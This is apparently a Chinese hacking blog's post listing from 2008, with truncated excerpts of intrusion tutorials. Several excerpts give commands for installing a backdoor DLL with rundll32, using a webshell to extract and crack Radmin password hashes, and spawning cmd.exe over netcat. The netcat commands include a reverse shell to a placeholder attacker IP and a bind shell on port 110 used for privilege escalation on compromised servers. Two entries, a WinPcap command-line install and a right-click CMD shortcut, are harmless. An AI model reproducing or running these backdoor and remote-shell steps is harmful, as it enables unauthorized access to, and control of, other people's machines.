网络安全
kingwrcy
这个作者很懒,什么都没留下…
展开
-
NameLess BackDoor
使用方法:安装1.将NameLess.dll(可以改名)上传到任意目录(最好是在系统目录:%winnt%/system32目录中)2.打开CMD窗口,转到后门放置的目录,输入安装命令:Rundll32 NameLess.dll,Install卸载命令:Rundll32 NameLess.dll,Remove 158352692注意下:命令区分大小写...自己测试时候没注意到...浪费了点时间...原创 2008-02-04 21:13:00 · 444 阅读 · 0 评论 -
命令行下装WinPcap
WinPcap是个很常用的工具,但必须在窗口界面下安装。在网上也可以找到不用GUI的版本(但还是有版权页),其实我们完全可以 自己做一个。 以WinPcap 3.0a 为例。通过比较安装前后的文件系统和注册表快照,很容易了解整个安装过程。 除去反安装的部分,关键的文件有三个:wpcap.dll,packet.dll和npf.sys。前面两个文件位于system32目录下,第三个在system 32转载 2008-02-04 19:06:00 · 366 阅读 · 0 评论 -
反汇编破解Radmin密码实例
一个webshell 最好有读取注册表的权限 如果不能读取radmin注册表至少wscript.shell组件没删 这样我们可 ...一个webshell 最好有读取注册表的权限 如果不能读取radmin注册表至少wscript.shell组件没删 这样我们可以调用cmd 导出radmin的表值 radmin的注册表值 也就是经过加密的MD5 hash值 是32位哦 比如 radmin的注册表里转载 2008-02-04 21:20:00 · 646 阅读 · 0 评论 -
解除TCP/IP限制的方法
1.用NC反弹得到一个shell 本机监听 NC -l -p 32 WEBSHELL运行: x:/xxx/serv-u.exe "x:/xxx/nc.exe -e cmd.exe *.*.*.* port" 得到一个shell 2.CMD下导出注册表文件 C:/>regedit -e x:/xxx/1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Ser原创 2008-02-12 13:08:00 · 523 阅读 · 0 评论 -
nc提权
环境说明: Server-U 不可利用 pcAnywhere没有安装提权思路: 上传NC,进行反弹连接。命令说明:nc -l -p 110 -t -e c:/winnt/system32/cmd.exe-l 监听本地入栈信息-p port 打开本地端口-t 以telnet形式应答入栈请求-e 程序重定向C:/RECYCLER/cmd.exeC:/RECYCLER/nc -l -p 1转载 2008-02-12 13:09:00 · 759 阅读 · 0 评论 -
给右键菜单加入CMD命令行快速通道
很多人都很喜欢在CMD命令行下来操作计算机,我也是其中之一。 如何快速打开CMD并且定位到指定的路径呢?很多优化软件(比如优化大师)都提供了往右键菜单中加入“CMD快速通道”的功能,当右键点击文件夹时,就打开CMD并定位到该文件夹。网上也有修改注册表来实现的,其实根本不用这么麻烦。 打开“我的电脑”,点击菜单中的“工具”-“文件夹选项”,选择“文件类型”,找到“(无)资料夹”,点“高级”,转载 2008-02-12 15:30:00 · 957 阅读 · 0 评论